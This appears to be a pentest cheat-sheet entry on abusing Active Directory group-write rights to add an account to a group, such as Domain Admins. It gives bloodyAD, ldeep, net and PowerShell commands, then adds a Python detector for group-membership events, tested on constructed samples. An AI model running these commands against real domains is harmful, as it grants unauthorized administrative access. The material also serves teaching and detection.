1. AddMember

1. Introduction

1.1. Conditions

This can be exploited when you control an object that has GenericAll, GenericWrite, Self, AllExtendedRights, or Self-Membership over the target group.

In this example, alfred can add itself to the Infrastructure group.

1.2. Exploitation

1.2.1. bloodyAD

# Add the user to the group
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember "$TargetGroup" "$TargetUser"

# Query the specified user's membership; can be used to check whether the addition succeeded
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get membership "$TargetUser"


1.2.2. ldeep

ldeep ldap -d "$DOMAIN" -s "$DC_IP" -u "$USER" -p "$PASSWORD" add_to_group "$TargetUser" "$TargetGroup"
# "$TargetUser" and "$TargetGroup" must be given in DN format


1.2.3. Windows cmd & PowerShell

# Command line (cmd.exe only treats double quotes as quoting characters)
net group "Domain Admins" user /add /domain

# PowerShell: Active Directory module
Add-ADGroupMember -Identity 'Domain Admins' -Members 'user'

# PowerShell: PowerSploit module
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'user'
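
Detection side, as an added example that is not part of the original note: every command above ends in a write to the group's member attribute, which a domain controller with "Audit Security Group Management" enabled logs as event 4728, 4732 or 4756 (global, local or universal group). The sketch below triages such events and flags the self-add case from section 1.1. The watch list, the SIDs, the example.local DNs and the helper names are constructed assumptions.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Member added to a security-enabled global / local / universal group
MEMBER_ADDED = {"4728": "global", "4732": "local", "4756": "universal"}
# Assumption: groups worth alerting on in this domain; tune to your environment
WATCHED_GROUPS = {"domain admins", "infrastructure"}

def triage(event_xml):
    """Return a finding dict for a group-member-added event, else None."""
    root = ET.fromstring(event_xml)
    event_id = root.findtext("e:System/e:EventID", namespaces=NS)
    if event_id not in MEMBER_ADDED:
        return None
    data = {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}
    reasons = []
    # The actor and the new member are the same principal (the alfred case)
    if data.get("SubjectUserSid") and data["SubjectUserSid"] == data.get("MemberSid"):
        reasons.append("self-add")
    if data.get("TargetUserName", "").lower() in WATCHED_GROUPS:
        reasons.append("watched-group")
    return {"scope": MEMBER_ADDED[event_id], "actor": data.get("SubjectUserName", ""),
            "member": data.get("MemberName", ""), "group": data.get("TargetUserName", ""),
            "reasons": reasons}

def sample_event(event_id, actor, actor_sid, member_dn, member_sid, group):
    """Build a constructed event in the Windows event XML layout (not a real log)."""
    fields = {"MemberName": member_dn, "MemberSid": member_sid, "TargetUserName": group,
              "SubjectUserSid": actor_sid, "SubjectUserName": actor}
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f"<EventData>{body}</EventData></Event>")

SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID
SAMPLES = [
    sample_event(4728, "alfred", f"{SID}-1104", "CN=alfred,CN=Users,DC=example,DC=local",
                 f"{SID}-1104", "Infrastructure"),
    sample_event(4756, "helpdesk", f"{SID}-1201", "CN=bob,CN=Users,DC=example,DC=local",
                 f"{SID}-1202", "Printer Operators Team"),
    sample_event(4624, "alfred", f"{SID}-1104", "-", "-", "-"),  # logon event: ignored
]

if __name__ == "__main__":
    for xml_text in SAMPLES:
        finding = triage(xml_text)
        if finding and finding["reasons"]:
            print(finding)
```
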